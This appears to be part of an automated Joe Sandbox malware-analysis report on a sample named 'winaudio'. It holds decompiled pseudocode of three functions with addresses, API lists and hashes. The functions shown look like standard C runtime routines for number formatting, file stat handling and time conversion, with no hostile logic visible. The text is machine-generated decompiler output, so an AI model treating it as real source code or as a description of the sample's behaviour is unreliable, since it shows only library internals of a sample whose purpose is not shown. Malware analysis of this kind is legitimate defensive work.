                        			E0038E647(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00380CF3(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00397D10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00397D10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x2
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0037E1A0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00397D10( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E003980F0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E003980F0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E003980F0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0038E94A(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E0037DD80(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00380E9E();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0037F971();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                        0x0038e647
                        0x0038e652
                        0x0038e659
                        0x0038e65b
                        0x0038e65b
                        0x0038e65d
                        0x0038e666
                        0x0038e668
                        0x0038e66d
                        0x0038e673
                        0x0038e689
                        0x0038e68e
                        0x0038e691
                        0x0038e69e
                        0x0038e6a3
                        0x0038e6f7
                        0x0038e6ff
                        0x0038e701
                        0x0038e703
                        0x0038e706
                        0x0038e706
                        0x0038e706
                        0x0038e70c
                        0x0038e714
                        0x0038e727
                        0x0038e72a
                        0x0038e72c
                        0x0038e72f
                        0x0038e730
                        0x0038e751
                        0x0038e754
                        0x0038e754
                        0x0038e732
                        0x0038e732
                        0x0038e734
                        0x0038e73f
                        0x0038e73f
                        0x0038e741
                        0x0038e748
                        0x0038e743
                        0x0038e743
                        0x0038e743
                        0x0038e741
                        0x0038e755
                        0x0038e757
                        0x0038e758
                        0x0038e75b
                        0x0038e75d
                        0x0038e771
                        0x0038e75f
                        0x0038e75f
                        0x0038e75f
                        0x0038e776
                        0x0038e776
                        0x0038e77b
                        0x0038e77e
                        0x0038e789
                        0x0038e789
                        0x0038e789
                        0x0038e789
                        0x0038e78d
                        0x0038e794
                        0x0038e795
                        0x0038e798
                        0x0038e79b
                        0x0038e79b
                        0x0038e79d
                        0x00000000
                        0x00000000
                        0x0038e7b5
                        0x0038e7bc
                        0x0038e7c0
                        0x0038e7c3
                        0x0038e7c6
                        0x0038e7c8
                        0x0038e7c8
                        0x0038e7c8
                        0x0038e7ca
                        0x0038e7cd
                        0x0038e7d0
                        0x0038e7d2
                        0x0038e7da
                        0x0038e7e0
                        0x0038e7e3
                        0x0038e7e6
                        0x0038e7e7
                        0x0038e7ea
                        0x0038e7ed
                        0x0038e7ed
                        0x0038e7f2
                        0x0038e7f5
                        0x00000000
                        0x00000000
                        0x0038e80d
                        0x0038e812
                        0x0038e816
                        0x00000000
                        0x00000000
                        0x0038e81a
                        0x0038e81a
                        0x0038e81d
                        0x0038e81e
                        0x0038e81e
                        0x0038e820
                        0x0038e823
                        0x00000000
                        0x00000000
                        0x0038e825
                        0x0038e828
                        0x0038e82f
                        0x0038e832
                        0x0038e835
                        0x0038e84b
                        0x0038e84b
                        0x0038e84b
                        0x0038e837
                        0x0038e837
                        0x0038e839
                        0x0038e83c
                        0x0038e847
                        0x0038e83e
                        0x0038e841
                        0x0038e841
                        0x0038e83c
                        0x00000000
                        0x0038e835
                        0x0038e82a
                        0x0038e82a
                        0x0038e82c
                        0x0038e82c
                        0x0038e780
                        0x0038e780
                        0x0038e783
                        0x0038e84e
                        0x0038e84e
                        0x0038e850
                        0x0038e852
                        0x0038e855
                        0x0038e856
                        0x0038e857
                        0x0038e858
                        0x0038e860
                        0x0038e860
                        0x0038e860
                        0x0038e862
                        0x0038e865
                        0x0038e868
                        0x0038e86a
                        0x0038e86a
                        0x0038e86c
                        0x0038e87e
                        0x0038e882
                        0x0038e885
                        0x0038e88c
                        0x0038e894
                        0x0038e894
                        0x0038e897
                        0x0038e899
                        0x0038e8aa
                        0x0038e8aa
                        0x0038e8ae
                        0x0038e8ae
                        0x0038e8b1
                        0x0038e8b3
                        0x0038e8b6
                        0x00000000
                        0x0038e89b
                        0x0038e89b
                        0x0038e8a1
                        0x0038e8a1
                        0x0038e8a5
                        0x0038e8b8
                        0x0038e8b8
                        0x0038e8bc
                        0x0038e8bd
                        0x0038e8bf
                        0x0038e8c1
                        0x0038e902
                        0x0038e902
                        0x0038e904
                        0x0038e911
                        0x0038e911
                        0x0038e913
                        0x0038e915
                        0x0038e916
                        0x0038e917
                        0x0038e91e
                        0x0038e921
                        0x0038e923
                        0x0038e923
                        0x0038e924
                        0x0038e926
                        0x0038e929
                        0x0038e929
                        0x0038e92b
                        0x0038e92d
                        0x00000000
                        0x0038e92d
                        0x0038e906
                        0x0038e908
                        0x00000000
                        0x00000000
                        0x0038e90a
                        0x00000000
                        0x00000000
                        0x0038e90c
                        0x0038e90f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038e90f
                        0x0038e8c8
                        0x0038e8ce
                        0x0038e8ce
                        0x0038e8d0
                        0x0038e8d1
                        0x0038e8d2
                        0x0038e8d3
                        0x0038e8da
                        0x0038e8dd
                        0x0038e8df
                        0x0038e8e0
                        0x0038e8e2
                        0x0038e8ef
                        0x0038e8ef
                        0x0038e8f1
                        0x0038e8f3
                        0x0038e8f4
                        0x0038e8f5
                        0x0038e8fc
                        0x0038e8ff
                        0x0038e901
                        0x0038e901
                        0x00000000
                        0x0038e901
                        0x0038e8e4
                        0x0038e8e4
                        0x0038e8e6
                        0x00000000
                        0x00000000
                        0x0038e8e8
                        0x00000000
                        0x00000000
                        0x0038e8ea
                        0x0038e8ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038e8ed
                        0x0038e8ca
                        0x0038e8cc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038e8cc
                        0x0038e89d
                        0x0038e89f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038e89f
                        0x0038e899
                        0x00000000
                        0x0038e783
                        0x0038e77e
                        0x0038e6a5
                        0x0038e6a7
                        0x00000000
                        0x0038e6a9
                        0x0038e6bf
                        0x0038e6c4
                        0x0038e6c6
                        0x0038e6d2
                        0x0038e6d8
                        0x0038e6d9
                        0x0038e6db
                        0x0038e6dd
                        0x0038e6e8
                        0x0038e6e8
                        0x0038e6eb
                        0x0038e6ed
                        0x0038e6ed
                        0x0038e6f0
                        0x0038e6c8
                        0x0038e6c8
                        0x0038e6c8
                        0x00000000
                        0x0038e6c6
                        0x0038e675
                        0x0038e675
                        0x0038e67c
                        0x0038e67d
                        0x0038e67f
                        0x0038e931
                        0x0038e935
                        0x0038e93a
                        0x0038e93a
                        0x0038e949
                        0x0038e949

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: 11808006ffdb2f1060c8c0e427e6140bdf15d4ca035717081a0ae351e6c11540
                        • Instruction ID: 02167cbbcbb478dd83bcc8cd7f943add4bd00499d6dec87dabcdb28ce2eebff8
                        • Opcode Fuzzy Hash: 11808006ffdb2f1060c8c0e427e6140bdf15d4ca035717081a0ae351e6c11540
                        • Instruction Fuzzy Hash: 2FA16632A043869FEB23EF28C8817AEBBE5EF51310F2941EDE4949B281D3788D41C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0039B2C3 Relevance: 6.2, APIs: 4, Instructions: 172pipeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E0039B2C3(void* __ebx, signed int __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				char _v64;
				void _v72;
				long _v76;
				intOrPtr _v80;
				char _v84;
				void* __esi;
				signed int _t53;
				intOrPtr _t66;
				int _t71;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				intOrPtr _t101;
				signed int _t106;
				signed int _t111;
				signed int _t113;
				signed int _t120;
				void* _t122;
				intOrPtr* _t127;
				signed int _t128;
				intOrPtr _t138;

				_t120 = __edx;
				_t53 =  *0x3e1008; // 0x847b54ee
				_v8 = _t53 ^ _t128;
				_t127 = _a16;
				_t122 = _a12;
				_v80 = _a4;
				_v76 = _t122;
				_t106 = GetFileType(_t122) & 0xffff7fff;
				if(_t106 != 1) {
					__eflags = _t106 - 2;
					if(_t106 == 2) {
						L16:
						_t120 = 0x1000;
						__eflags = _t106 - 2;
						 *((short*)(_t127 + 6)) = ((0 | _t106 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
						 *((short*)(_t127 + 8)) = 1;
						_t66 = _a8;
						 *((intOrPtr*)(_t127 + 0x10)) = _t66;
						 *_t127 = _t66;
						__eflags = _t106 - 2;
						if(_t106 != 2) {
							_t71 = PeekNamedPipe(_t122, 0, 0, 0,  &_v76, 0);
							__eflags = _t71;
							if(_t71 != 0) {
								 *((intOrPtr*)(_t127 + 0x14)) = _v76;
							}
						}
						__eflags = 1;
						L20:
						return E002E056D(_v8 ^ _t128, _t120, _t127);
					}
					__eflags = _t106 - 3;
					if(_t106 == 3) {
						goto L16;
					}
					__eflags = _t106;
					if(_t106 != 0) {
						L15:
						E00380E68(GetLastError());
						L14:
						goto L20;
					}
					 *((intOrPtr*)(E00380E9E())) = 9;
					goto L14;
				}
				 *((short*)(_t127 + 8)) = 1;
				_t76 = _v80;
				if(_v80 == 0) {
					L4:
					_t111 = 0xa;
					memset( &_v48, 0, _t111 << 2);
					if(E0038DC70(0, _t138, _v76, 0,  &_v48, 0x28) == 0) {
						goto L15;
					}
					 *((short*)(_t127 + 6)) = E0039B5F5(0, _v16, _v80);
					_t83 = E0039B47B(_t127, _v32, _v28, 0, 0);
					 *(_t127 + 0x20) = _t83;
					 *(_t127 + 0x24) = _t120;
					if((_t83 & _t120) == 0xffffffff) {
						goto L14;
					}
					_t24 = _t127 + 0x20; // 0x83cc758d
					_t85 = E0039B47B(_t127, _v40, _v36,  *_t24, _t120);
					 *(_t127 + 0x18) = _t85;
					 *(_t127 + 0x1c) = _t120;
					if((_t85 & _t120) == 0xffffffff) {
						goto L14;
					}
					_t29 = _t127 + 0x24; // 0xcb830cc4
					_t30 = _t127 + 0x20; // 0x83cc758d
					_t87 = E0039B47B(_t127, _v48, _v44,  *_t30,  *_t29);
					 *(_t127 + 0x28) = _t87;
					 *(_t127 + 0x2c) = _t120;
					_t142 = (_t87 & _t120) - 0xffffffff;
					if((_t87 & _t120) == 0xffffffff) {
						goto L14;
					}
					_t113 = 6;
					memset( &_v72, 0, _t113 << 2);
					if(E0038DC70(0, _t142, _v76, 1,  &_v72, 0x18) == 0) {
						goto L15;
					}
					_t39 = _t127 + 0x14; // 0x39b205
					E0039B5C3( &_v64, _t39);
					goto L20;
				}
				_v84 = 0;
				if(E0039B65B(_t76,  &_v84) == 0) {
					goto L14;
				}
				_t101 = _v84 - 1;
				_t138 = _t101;
				 *((intOrPtr*)(_t127 + 0x10)) = _t101;
				 *_t127 = _t101;
				goto L4;
			}
































                        0x0039b2c3
                        0x0039b2cb
                        0x0039b2d2
                        0x0039b2da
                        0x0039b2de
                        0x0039b2e2
                        0x0039b2e5
                        0x0039b2f2
                        0x0039b2fb
                        0x0039b3f6
                        0x0039b3f9
                        0x0039b422
                        0x0039b424
                        0x0039b429
                        0x0039b434
                        0x0039b43b
                        0x0039b43f
                        0x0039b442
                        0x0039b445
                        0x0039b447
                        0x0039b44a
                        0x0039b457
                        0x0039b45d
                        0x0039b45f
                        0x0039b464
                        0x0039b464
                        0x0039b45f
                        0x0039b469
                        0x0039b46a
                        0x0039b47a
                        0x0039b47a
                        0x0039b3fb
                        0x0039b3fe
                        0x00000000
                        0x00000000
                        0x0039b400
                        0x0039b402
                        0x0039b413
                        0x0039b41a
                        0x0039b40f
                        0x00000000
                        0x0039b40f
                        0x0039b409
                        0x00000000
                        0x0039b409
                        0x0039b301
                        0x0039b307
                        0x0039b30c
                        0x0039b32e
                        0x0039b330
                        0x0039b338
                        0x0039b349
                        0x00000000
                        0x00000000
                        0x0039b360
                        0x0039b367
                        0x0039b36c
                        0x0039b374
                        0x0039b37a
                        0x00000000
                        0x00000000
                        0x0039b381
                        0x0039b38a
                        0x0039b38f
                        0x0039b397
                        0x0039b39d
                        0x00000000
                        0x00000000
                        0x0039b39f
                        0x0039b3a2
                        0x0039b3ab
                        0x0039b3b0
                        0x0039b3b8
                        0x0039b3bb
                        0x0039b3be
                        0x00000000
                        0x00000000
                        0x0039b3c2
                        0x0039b3c8
                        0x0039b3de
                        0x00000000
                        0x00000000
                        0x0039b3e0
                        0x0039b3e8
                        0x00000000
                        0x0039b3f1
                        0x0039b311
                        0x0039b31f
                        0x00000000
                        0x00000000
                        0x0039b328
                        0x0039b328
                        0x0039b329
                        0x0039b32c
                        0x00000000

                        APIs
                        • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 0039B2E8
                          • Part of subcall function 0039B65B: __dosmaperr.LIBCMT ref: 0039B69E
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0039B1F1), ref: 0039B413
                        • __dosmaperr.LIBCMT ref: 0039B41A
                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0039B457
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                        • String ID:
                        • API String ID: 3955570002-0
                        • Opcode ID: 840694cc2d9ec1a7f953a5ea16ff049f0ecedb6a1ead11b18eeaeb7438f5e798
                        • Instruction ID: a884f307f8d31a6af79517de4ff942cb41a2114acbb70ba30d1bc2da529f3913
                        • Opcode Fuzzy Hash: 840694cc2d9ec1a7f953a5ea16ff049f0ecedb6a1ead11b18eeaeb7438f5e798
                        • Instruction Fuzzy Hash: A4510172900608AFCF26DFB9DD819BFF7F9EF08310B148929E556D6261E730A8429B10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038B2F7 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E0038B2F7(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0038B444(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00397FE0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x3d0544;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x3d0510;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00397FE0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00397FE0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00397FE0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E00380E9E();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E00380E9E();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0037F971();
					goto L11;
				}
				_t71 = E00380E9E();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0037F971();
				return _t103;
			}
































                        0x0038b300
                        0x0038b305
                        0x0038b325
                        0x0038b326
                        0x0038b328
                        0x0038b32b
                        0x0038b32d
                        0x0038b340
                        0x0038b343
                        0x0038b345
                        0x0038b348
                        0x0038b34b
                        0x0038b34e
                        0x0038b359
                        0x0038b35b
                        0x0038b35c
                        0x0038b35e
                        0x0038b37a
                        0x0038b37e
                        0x0038b387
                        0x0038b38c
                        0x0038b393
                        0x0038b3a0
                        0x0038b3a5
                        0x0038b3af
                        0x0038b3b4
                        0x0038b3b9
                        0x0038b3bb
                        0x0038b3c2
                        0x0038b3c4
                        0x0038b3c4
                        0x0038b3c9
                        0x0038b3ce
                        0x0038b3cf
                        0x0038b3d2
                        0x0038b3da
                        0x0038b3da
                        0x0038b3db
                        0x0038b3e9
                        0x0038b3f1
                        0x0038b3fe
                        0x0038b3ff
                        0x0038b409
                        0x0038b40f
                        0x0038b419
                        0x0038b420
                        0x0038b424
                        0x0038b428
                        0x0038b42d
                        0x0038b431
                        0x0038b439
                        0x0038b439
                        0x0038b43b
                        0x0038b43e
                        0x00000000
                        0x0038b3d4
                        0x0038b3d4
                        0x0038b3d4
                        0x0038b3d5
                        0x0038b3d5
                        0x00000000
                        0x0038b3d4
                        0x0038b3d2
                        0x0038b360
                        0x0038b369
                        0x0038b369
                        0x0038b370
                        0x0038b371
                        0x0038b373
                        0x0038b373
                        0x00000000
                        0x0038b373
                        0x0038b362
                        0x0038b367
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038b367
                        0x0038b350
                        0x00000000
                        0x00000000
                        0x0038b352
                        0x0038b357
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038b357
                        0x0038b32f
                        0x0038b336
                        0x0038b337
                        0x0038b339
                        0x00000000
                        0x0038b339
                        0x0038b307
                        0x0038b30e
                        0x0038b30f
                        0x0038b311
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
